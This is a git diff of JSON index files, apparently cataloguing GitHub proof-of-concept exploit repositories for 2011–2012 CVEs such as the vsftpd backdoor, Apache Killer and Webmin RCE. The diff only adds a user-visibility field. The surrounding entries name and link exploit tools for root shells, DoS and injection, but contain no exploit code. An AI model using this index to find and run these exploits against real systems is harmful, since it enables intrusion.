"https:\/\/avatars.githubusercontent.com\/u\/121700816?v=4", - "html_url": "https:\/\/github.com\/chleba124" + "html_url": "https:\/\/github.com\/chleba124", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/chleba124\/vsftpd-exploit", "description": "A tool that exploits the CVE-2011-2523 vulnerability.", @@ -383,7 +395,8 @@ "login": "4m3rr0r", "id": 90191914, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90191914?v=4", - "html_url": "https:\/\/github.com\/4m3rr0r" + "html_url": "https:\/\/github.com\/4m3rr0r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/4m3rr0r\/CVE-2011-2523-poc", "description": "Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)", @@ -420,7 +433,8 @@ "login": "Shubham-2k1", "id": 71768868, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71768868?v=4", - "html_url": "https:\/\/github.com\/Shubham-2k1" + "html_url": "https:\/\/github.com\/Shubham-2k1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Shubham-2k1\/Exploit-CVE-2011-2523", "description": null, @@ -450,7 +464,8 @@ "login": "Tenor-Z", "id": 55516164, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55516164?v=4", - "html_url": "https:\/\/github.com\/Tenor-Z" + "html_url": "https:\/\/github.com\/Tenor-Z", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Tenor-Z\/SmileySploit", "description": "A basic script that exploits CVE-2011-2523", @@ -480,7 +495,8 @@ "login": "R4idB0Y", "id": 132174647, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132174647?v=4", - "html_url": "https:\/\/github.com\/R4idB0Y" + "html_url": "https:\/\/github.com\/R4idB0Y", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/R4idB0Y\/CVE-2011-2523-PoC", "description": "PoC CVE-2011-2523 ", @@ -510,7 +526,8 @@ "login": "AnugiArrawwala", "id": 141626082, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141626082?v=4", - "html_url": "https:\/\/github.com\/AnugiArrawwala" + "html_url": "https:\/\/github.com\/AnugiArrawwala", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AnugiArrawwala\/CVE-Research", "description": "CVE-2017-0144 (Eternal Blue) | CVE-2023-3881 | CVE-2011-2523", @@ -540,7 +557,8 @@ "login": "Gill-Singh-A", "id": 123238182, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123238182?v=4", - "html_url": "https:\/\/github.com\/Gill-Singh-A" + "html_url": "https:\/\/github.com\/Gill-Singh-A", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gill-Singh-A\/vsFTP-2.3.4-Remote-Root-Shell-Exploit", "description": "A Simple Python Program that uses gets a Remote Root Shell on the Target Device by exploiting a Vulnerability (CVE-2011-2523) present in vsFTP 2.3.4", @@ -577,7 +595,8 @@ "login": "everythingBlackkk", "id": 142638957, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142638957?v=4", - "html_url": "https:\/\/github.com\/everythingBlackkk" + "html_url": "https:\/\/github.com\/everythingBlackkk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/everythingBlackkk\/vsFTPd-Backdoor-Exploit-CVE-2011-2523-", "description": "This tool exploits a well-known backdoor vulnerability found in vsFTPd version 2.3.4 (CVE-2011-2523)", diff --git a/2011/CVE-2011-2894.json b/2011/CVE-2011-2894.json index c1fd8afac0..f53331cad5 100644 --- a/2011/CVE-2011-2894.json +++ b/2011/CVE-2011-2894.json @@ -7,7 +7,8 @@ "login": "pwntester", "id": 125701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125701?v=4", - "html_url": "https:\/\/github.com\/pwntester" + "html_url": "https:\/\/github.com\/pwntester", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pwntester\/SpringBreaker", "description": "Exploit PoC for Spring RCE issue (CVE-2011-2894)", diff --git a/2011/CVE-2011-3026.json b/2011/CVE-2011-3026.json index 210c6e8f43..d4a9d0d305 100644 --- a/2011/CVE-2011-3026.json +++ b/2011/CVE-2011-3026.json @@ -7,7 +7,8 @@ "login": "argp", "id": 145419, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145419?v=4", - "html_url": "https:\/\/github.com\/argp" + "html_url": "https:\/\/github.com\/argp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/argp\/cve-2011-3026-firefox", "description": "Example of exploiting CVE-2011-3026 on Firefox (Linux\/x86)", diff --git a/2011/CVE-2011-3192.json b/2011/CVE-2011-3192.json index 880237c34e..34ff130d70 100644 --- a/2011/CVE-2011-3192.json +++ b/2011/CVE-2011-3192.json @@ -7,7 +7,8 @@ "login": "tkisason", "id": 577380, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/577380?v=4", - "html_url": "https:\/\/github.com\/tkisason" + "html_url": "https:\/\/github.com\/tkisason", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tkisason\/KillApachePy", "description": "Python Apache Killer (Range Header DoS CVE-2011-3192)", @@ -37,7 +38,8 @@ "login": "limkokholefork", "id": 82161820, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82161820?v=4", - "html_url": "https:\/\/github.com\/limkokholefork" + "html_url": "https:\/\/github.com\/limkokholefork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/limkokholefork\/CVE-2011-3192", "description": "Apache Range Header DoS Exploit", @@ -67,7 +69,8 @@ "login": "stcmjp", "id": 29936047, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29936047?v=4", - "html_url": "https:\/\/github.com\/stcmjp" + "html_url": "https:\/\/github.com\/stcmjp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stcmjp\/cve-2011-3192", "description": "This Repository use to test Apache Killer (cve-2011-3192).", @@ -97,7 +100,8 @@ "login": "futurezayka", "id": 114442776, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114442776?v=4", - "html_url": "https:\/\/github.com\/futurezayka" + "html_url": "https:\/\/github.com\/futurezayka", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/futurezayka\/CVE-2011-3192", "description": null, diff --git a/2011/CVE-2011-3368.json b/2011/CVE-2011-3368.json index 71c4fa95af..7d56730aff 100644 --- a/2011/CVE-2011-3368.json +++ b/2011/CVE-2011-3368.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2011-3368", "description": "CVE-2011-3368 exploit code", @@ -39,7 +40,8 @@ "login": "colorblindpentester", "id": 45195264, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45195264?v=4", - "html_url": "https:\/\/github.com\/colorblindpentester" + "html_url": "https:\/\/github.com\/colorblindpentester", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/colorblindpentester\/CVE-2011-3368", "description": "PoC Scan. (cve-2011-3368)", diff --git a/2011/CVE-2011-3389.json b/2011/CVE-2011-3389.json index 830b595255..f5386f5cbc 100644 --- a/2011/CVE-2011-3389.json +++ b/2011/CVE-2011-3389.json @@ -7,7 +7,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/BEAST-PoC", "description": ":muscle: Proof Of Concept of the BEAST attack against SSL\/TLS CVE-2011-3389 :muscle:", diff --git a/2011/CVE-2011-3556.json b/2011/CVE-2011-3556.json index b5f5bfc711..8a30ed6ecd 100644 --- a/2011/CVE-2011-3556.json +++ b/2011/CVE-2011-3556.json @@ -7,7 +7,8 @@ "login": "sk4la", "id": 38187780, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38187780?v=4", - "html_url": "https:\/\/github.com\/sk4la" + "html_url": "https:\/\/github.com\/sk4la", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sk4la\/cve_2011_3556", "description": "Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).", diff --git a/2011/CVE-2011-3872.json b/2011/CVE-2011-3872.json index e5a948fc1c..2711f6f084 100644 --- a/2011/CVE-2011-3872.json +++ b/2011/CVE-2011-3872.json @@ -7,7 +7,8 @@ "login": "puppetlabs-toy-chest", "id": 88753164, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88753164?v=4", - "html_url": "https:\/\/github.com\/puppetlabs-toy-chest" + "html_url": "https:\/\/github.com\/puppetlabs-toy-chest", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/puppetlabs-toy-chest\/puppetlabs-cve20113872", "description": "Puppet Module to help fix and migrate a Puppet deployment (CVE-2011-3872)", diff --git a/2011/CVE-2011-4107.json b/2011/CVE-2011-4107.json index 704006ce4e..0c08bf2862 100644 --- a/2011/CVE-2011-4107.json +++ b/2011/CVE-2011-4107.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2011-4107", "description": "phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion", diff --git a/2011/CVE-2011-4862.json b/2011/CVE-2011-4862.json index cd0292014e..ac720b809f 100644 --- a/2011/CVE-2011-4862.json +++ b/2011/CVE-2011-4862.json @@ -7,7 +7,8 @@ "login": "hdbreaker", "id": 5799585, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5799585?v=4", - "html_url": "https:\/\/github.com\/hdbreaker" + "html_url": "https:\/\/github.com\/hdbreaker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hdbreaker\/GO-CVE-2011-4862", "description": "Go Exploit for CVE-2011-4862", @@ -37,7 +38,8 @@ "login": "lol-fi", "id": 44122650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44122650?v=4", - "html_url": "https:\/\/github.com\/lol-fi" + "html_url": "https:\/\/github.com\/lol-fi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lol-fi\/cve-2011-4862", "description": null, @@ -67,7 +69,8 @@ "login": "kpawar2410", "id": 51210677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51210677?v=4", - "html_url": "https:\/\/github.com\/kpawar2410" + "html_url": "https:\/\/github.com\/kpawar2410", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kpawar2410\/CVE-2011-4862", "description": "Final Project for Security and Privacy CS 600.443", diff --git a/2011/CVE-2011-4919.json b/2011/CVE-2011-4919.json index 2d08240d20..404183b645 100644 --- a/2011/CVE-2011-4919.json +++ b/2011/CVE-2011-4919.json @@ -7,7 +7,8 @@ "login": "hartwork", "id": 1577132, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1577132?v=4", - "html_url": "https:\/\/github.com\/hartwork" + "html_url": "https:\/\/github.com\/hartwork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hartwork\/mpacktrafficripper", "description": ":unlock: CVE-2011-4919 -- mpack information disclosure demo (C)", diff --git a/2011/CVE-2011-5331.json b/2011/CVE-2011-5331.json index d99037fd16..3e83699a90 100644 --- a/2011/CVE-2011-5331.json +++ b/2011/CVE-2011-5331.json @@ -7,7 +7,8 @@ "login": "tomquinn8", "id": 74976996, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74976996?v=4", - "html_url": "https:\/\/github.com\/tomquinn8" + "html_url": "https:\/\/github.com\/tomquinn8", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tomquinn8\/CVE-2011-5331", "description": null, diff --git a/2012/CVE-2012-0002.json b/2012/CVE-2012-0002.json index d7d959efb5..a526c47d1d 100644 --- a/2012/CVE-2012-0002.json +++ b/2012/CVE-2012-0002.json @@ -7,7 +7,8 @@ "login": "zhangkaibin0921", "id": 82947463, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82947463?v=4", - "html_url": "https:\/\/github.com\/zhangkaibin0921" + "html_url": "https:\/\/github.com\/zhangkaibin0921", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhangkaibin0921\/MS12-020-CVE-2012-0002", "description": null, diff --git a/2012/CVE-2012-0003.json b/2012/CVE-2012-0003.json index 00fdaa0943..7bec270495 100644 --- a/2012/CVE-2012-0003.json +++ b/2012/CVE-2012-0003.json @@ -7,7 +7,8 @@ "login": "k0keoyo", "id": 13257929, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13257929?v=4", - "html_url": "https:\/\/github.com\/k0keoyo" + "html_url": "https:\/\/github.com\/k0keoyo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/k0keoyo\/CVE-2012-0003_eXP", "description": null, diff --git a/2012/CVE-2012-0056.json b/2012/CVE-2012-0056.json index 5cf37ca12b..7d76675baa 100644 --- a/2012/CVE-2012-0056.json +++ b/2012/CVE-2012-0056.json @@ -7,7 +7,8 @@ "login": "srclib", "id": 1203705, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1203705?v=4", - "html_url": "https:\/\/github.com\/srclib" + "html_url": "https:\/\/github.com\/srclib", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/srclib\/CVE-2012-0056", "description": "Mempodipper, a linux local root exploit.", @@ -37,7 +38,8 @@ "login": "pythonone", "id": 14039690, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14039690?v=4", - "html_url": "https:\/\/github.com\/pythonone" + "html_url": "https:\/\/github.com\/pythonone", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pythonone\/CVE-2012-0056", "description": "linux 提权", diff --git a/2012/CVE-2012-0152.json b/2012/CVE-2012-0152.json index a29a7e891e..cd34037c4d 100644 --- a/2012/CVE-2012-0152.json +++ b/2012/CVE-2012-0152.json @@ -7,7 +7,8 @@ "login": "rutvijjethwa", "id": 19925118, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19925118?v=4", - "html_url": "https:\/\/github.com\/rutvijjethwa" + "html_url": "https:\/\/github.com\/rutvijjethwa", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rutvijjethwa\/RDP_jammer", "description": "CVE-2012-0152", diff --git a/2012/CVE-2012-0158.json b/2012/CVE-2012-0158.json index 8b41094814..0c1bfd35fd 100644 --- a/2012/CVE-2012-0158.json +++ b/2012/CVE-2012-0158.json @@ -7,7 +7,8 @@ "login": "RobertoLeonFR-ES", "id": 93054044, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93054044?v=4", - "html_url": "https:\/\/github.com\/RobertoLeonFR-ES" + "html_url": "https:\/\/github.com\/RobertoLeonFR-ES", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RobertoLeonFR-ES\/Exploit-Win32.CVE-2012-0158.F.doc", "description": "the name of virus is the detection of microsoft defender, is the tipic antivirus", @@ -37,7 +38,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2012-0158-reproduction", "description": "CVE-2012-0158复现", diff --git a/2012/CVE-2012-1495.json b/2012/CVE-2012-1495.json index 428364f963..80a8a02adb 100644 --- a/2012/CVE-2012-1495.json +++ b/2012/CVE-2012-1495.json @@ -7,7 +7,8 @@ "login": "axelbankole", "id": 132128032, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132128032?v=4", - "html_url": "https:\/\/github.com\/axelbankole" + "html_url": "https:\/\/github.com\/axelbankole", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/axelbankole\/CVE-2012-1495-Webcalendar-", "description": null, diff --git a/2012/CVE-2012-1675.json b/2012/CVE-2012-1675.json index 1f77246934..2c9fb1423b 100644 --- a/2012/CVE-2012-1675.json +++ b/2012/CVE-2012-1675.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/CVE-2012-1675", "description": "Oracle Database TNS Listener Poison Attack Vulnerability", diff --git a/2012/CVE-2012-1723.json b/2012/CVE-2012-1723.json index e4241400ae..24dcd14cd7 100644 --- a/2012/CVE-2012-1723.json +++ b/2012/CVE-2012-1723.json @@ -7,7 +7,8 @@ "login": "EthanNJC", "id": 1881442, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1881442?v=4", - "html_url": "https:\/\/github.com\/EthanNJC" + "html_url": "https:\/\/github.com\/EthanNJC", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/EthanNJC\/CVE-2012-1723", "description": "Proof of concept exploit for CVE-2012-1723", diff --git a/2012/CVE-2012-1823.json b/2012/CVE-2012-1823.json index d4dd7e140a..208caf8b80 100644 --- a/2012/CVE-2012-1823.json +++ b/2012/CVE-2012-1823.json @@ -7,7 +7,8 @@ "login": "drone789", "id": 11384759, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11384759?v=4", - "html_url": "https:\/\/github.com\/drone789" + "html_url": "https:\/\/github.com\/drone789", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/drone789\/CVE-2012-1823", "description": null, @@ -37,7 +38,8 @@ "login": "tardummy01", "id": 22663702, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22663702?v=4", - "html_url": "https:\/\/github.com\/tardummy01" + "html_url": "https:\/\/github.com\/tardummy01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tardummy01\/oscp_scripts-1", "description": "First script, pgp-cgi-cve-2012-1823 BASH script", @@ -67,7 +69,8 @@ "login": "Unix13", "id": 52569108, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52569108?v=4", - "html_url": "https:\/\/github.com\/Unix13" + "html_url": "https:\/\/github.com\/Unix13", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Unix13\/metasploitable2", "description": "PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, VSFTPD2.3.4, samba CVE-2007-2447, JAVA RMI Server, distcc daemon, misconfigured NFS files, etc.", @@ -97,7 +100,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/PHP_CVE-2012-1823", "description": null, @@ -127,7 +131,8 @@ "login": "0xl0k1", "id": 141760484, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141760484?v=4", - "html_url": "https:\/\/github.com\/0xl0k1" + "html_url": "https:\/\/github.com\/0xl0k1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xl0k1\/CVE-2012-1823", "description": "PHP CGI Argument Injection.", diff --git a/2012/CVE-2012-1870.json b/2012/CVE-2012-1870.json index cdda575f8d..55ed000ef0 100644 --- a/2012/CVE-2012-1870.json +++ b/2012/CVE-2012-1870.json @@ -7,7 +7,8 @@ "login": "dja2TaqkGEEfA45", "id": 82131630, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4", - "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45" + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2012-1870", "description": null, diff --git a/2012/CVE-2012-1876.json b/2012/CVE-2012-1876.json index 4a3093b03e..b224530f2b 100644 --- a/2012/CVE-2012-1876.json +++ b/2012/CVE-2012-1876.json @@ -7,7 +7,8 @@ "login": "WizardVan", "id": 7245104, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7245104?v=4", - "html_url": "https:\/\/github.com\/WizardVan" + "html_url": "https:\/\/github.com\/WizardVan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WizardVan\/CVE-2012-1876", "description": "CVE-2012-1876 simple calc exploitation ", @@ -37,7 +38,8 @@ "login": "ExploitCN", "id": 98264245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4", - "html_url": "https:\/\/github.com\/ExploitCN" + "html_url": "https:\/\/github.com\/ExploitCN", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2012-1876-win7_x86_and_win7x64", "description": "CVE-2012-1876 win7_x86和x64平台分析,EXP、POC代码和分析文档", diff --git a/2012/CVE-2012-1889.json b/2012/CVE-2012-1889.json index 81feac6743..e6bae773f3 100644 --- a/2012/CVE-2012-1889.json +++ b/2012/CVE-2012-1889.json @@ -7,7 +7,8 @@ "login": "whu-enjoy", "id": 17870213, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17870213?v=4", - "html_url": "https:\/\/github.com\/whu-enjoy" + "html_url": "https:\/\/github.com\/whu-enjoy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/whu-enjoy\/CVE-2012-1889", "description": "这里保存着我学习CVE-2012-1889这个漏洞的利用所用到的文件", @@ -37,7 +38,8 @@ "login": "l-iberty", "id": 15071029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15071029?v=4", - "html_url": "https:\/\/github.com\/l-iberty" + "html_url": "https:\/\/github.com\/l-iberty", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/l-iberty\/cve-2012-1889", "description": null, diff --git a/2012/CVE-2012-2122.json b/2012/CVE-2012-2122.json index a46d88e77d..9b3d8bced7 100644 --- a/2012/CVE-2012-2122.json +++ b/2012/CVE-2012-2122.json @@ -7,7 +7,8 @@ "login": "Avinza", "id": 4388589, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4388589?v=4", - "html_url": "https:\/\/github.com\/Avinza" + "html_url": "https:\/\/github.com\/Avinza", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Avinza\/CVE-2012-2122-scanner", "description": "This is used to scan for CVE-2012-2122 vulnerable servers.", @@ -37,7 +38,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/Oracle-mysql-CVE-2012-2122", "description": null, @@ -67,7 +69,8 @@ "login": "zhangkaibin0921", "id": 82947463, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82947463?v=4", - "html_url": "https:\/\/github.com\/zhangkaibin0921" + "html_url": "https:\/\/github.com\/zhangkaibin0921", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhangkaibin0921\/CVE-2012-2122", "description": null, diff --git a/2012/CVE-2012-2593.json b/2012/CVE-2012-2593.json index 60851dcd67..715a4d158d 100644 --- a/2012/CVE-2012-2593.json +++ b/2012/CVE-2012-2593.json @@ -7,7 +7,8 @@ "login": "AndrewTrube", "id": 53106750, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53106750?v=4", - "html_url": "https:\/\/github.com\/AndrewTrube" + "html_url": "https:\/\/github.com\/AndrewTrube", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AndrewTrube\/CVE-2012-2593", "description": "Atmail XSS-CSRF-RCE Exploit Chain", diff --git a/2012/CVE-2012-2661.json b/2012/CVE-2012-2661.json index 5786175d0b..5b89d2463d 100644 --- a/2012/CVE-2012-2661.json +++ b/2012/CVE-2012-2661.json @@ -7,7 +7,8 @@ "login": "r4x0r1337", "id": 99073650, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99073650?v=4", - "html_url": "https:\/\/github.com\/r4x0r1337" + "html_url": "https:\/\/github.com\/r4x0r1337", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/r4x0r1337\/-CVE-2012-2661-ActiveRecord-SQL-injection-", "description": null, diff --git a/2012/CVE-2012-2688.json b/2012/CVE-2012-2688.json index 4b3a06b0d8..83c870d10e 100644 --- a/2012/CVE-2012-2688.json +++ b/2012/CVE-2012-2688.json @@ -7,7 +7,8 @@ "login": "shelld3v", "id": 59408894, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59408894?v=4", - "html_url": "https:\/\/github.com\/shelld3v" + "html_url": "https:\/\/github.com\/shelld3v", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shelld3v\/CVE-2012-2688", "description": "A CVE-2012-2688 shell", diff --git a/2012/CVE-2012-2982.json b/2012/CVE-2012-2982.json index 7cc71098c2..e95f7339f0 100644 --- a/2012/CVE-2012-2982.json +++ b/2012/CVE-2012-2982.json @@ -7,7 +7,8 @@ "login": "cd6629", "id": 63489620, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489620?v=4", - "html_url": "https:\/\/github.com\/cd6629" + "html_url": "https:\/\/github.com\/cd6629", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cd6629\/CVE-2012-2982-Python-PoC", "description": "This was converted from a metasploit module as an exercise for OSCP studying", @@ -37,7 +38,8 @@ "login": "OstojaOfficial", "id": 21225822, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21225822?v=4", - "html_url": "https:\/\/github.com\/OstojaOfficial" + "html_url": "https:\/\/github.com\/OstojaOfficial", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/OstojaOfficial\/CVE-2012-2982", "description": "Python exploit for CVE-2012-2982", @@ -67,7 +69,8 @@ "login": "AlexJS6", "id": 63366907, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63366907?v=4", - "html_url": "https:\/\/github.com\/AlexJS6" + "html_url": "https:\/\/github.com\/AlexJS6", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AlexJS6\/CVE-2012-2982_Python", "description": "PoC Python script as an exercice from tryhackme.", @@ -97,7 +100,8 @@ "login": "Ari-Weinberg", "id": 67128976, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67128976?v=4", - "html_url": "https:\/\/github.com\/Ari-Weinberg" + "html_url": "https:\/\/github.com\/Ari-Weinberg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ari-Weinberg\/CVE-2012-2982", "description": "Exploit for CVE-2012-2982", @@ -127,7 +131,8 @@ "login": "JohnHammond", "id": 6288722, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4", - "html_url": "https:\/\/github.com\/JohnHammond" + "html_url": "https:\/\/github.com\/JohnHammond", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2012-2982", "description": "A Python replicated exploit for Webmin 1.580 \/file\/show.cgi Remote Code Execution", @@ -157,7 +162,8 @@ "login": "R00tendo", "id": 72181445, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72181445?v=4", - "html_url": "https:\/\/github.com\/R00tendo" + "html_url": "https:\/\/github.com\/R00tendo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/R00tendo\/CVE-2012-2982", "description": null, @@ -189,7 +195,8 @@ "login": "blu3ming", "id": 25083316, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25083316?v=4", - "html_url": "https:\/\/github.com\/blu3ming" + "html_url": "https:\/\/github.com\/blu3ming", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/blu3ming\/CVE-2012-2982", "description": "POC en Python para el CVE-2012-2982 mejorado del original por el usuario @OstojaOfficial", @@ -219,7 +226,8 @@ "login": "0xF331-D3AD", "id": 107276306, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107276306?v=4", - "html_url": "https:\/\/github.com\/0xF331-D3AD" + "html_url": "https:\/\/github.com\/0xF331-D3AD", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xF331-D3AD\/CVE-2012-2982", "description": null, @@ -249,7 +257,8 @@ "login": "0xTas", "id": 103238549, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103238549?v=4", - "html_url": "https:\/\/github.com\/0xTas" + "html_url": "https:\/\/github.com\/0xTas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTas\/CVE-2012-2982", "description": "An exploit for CVE-2012-2982 implemented in Rust", @@ -285,7 +294,8 @@ "login": "LeDucKhiem", "id": 109100186, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109100186?v=4", - "html_url": "https:\/\/github.com\/LeDucKhiem" + "html_url": "https:\/\/github.com\/LeDucKhiem", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LeDucKhiem\/CVE-2012-2982", "description": "my own script in python to exploit vulnerable (It based on TryHackMe Intro PoC Scripting room) ", @@ -315,7 +325,8 @@ "login": "CpyRe", "id": 46545030, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46545030?v=4", - "html_url": "https:\/\/github.com\/CpyRe" + "html_url": "https:\/\/github.com\/CpyRe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/CpyRe\/CVE-2012-2982", "description": "Practice POC scripting in Tryhackme’s intro poc scripting room (For Linux)", @@ -345,7 +356,8 @@ "login": "Shadow-Spinner", "id": 58800445, "avatar_url": 